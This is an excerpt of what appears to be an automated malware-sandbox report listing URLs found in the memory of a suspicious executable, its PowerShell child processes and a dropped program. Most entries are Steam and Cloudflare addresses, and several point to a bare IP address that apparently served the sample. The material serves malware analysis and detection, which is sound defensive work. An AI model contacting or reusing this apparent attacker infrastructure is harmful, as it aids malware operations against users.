Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coU
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://37.27.43.98
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/(
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/5
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/://Z
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/A
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/B_F
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/icate
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/n
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/r
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/rG8
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/s
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/v
Source: powershell.exe, 00000007.00000002.1619557449.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamsta
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
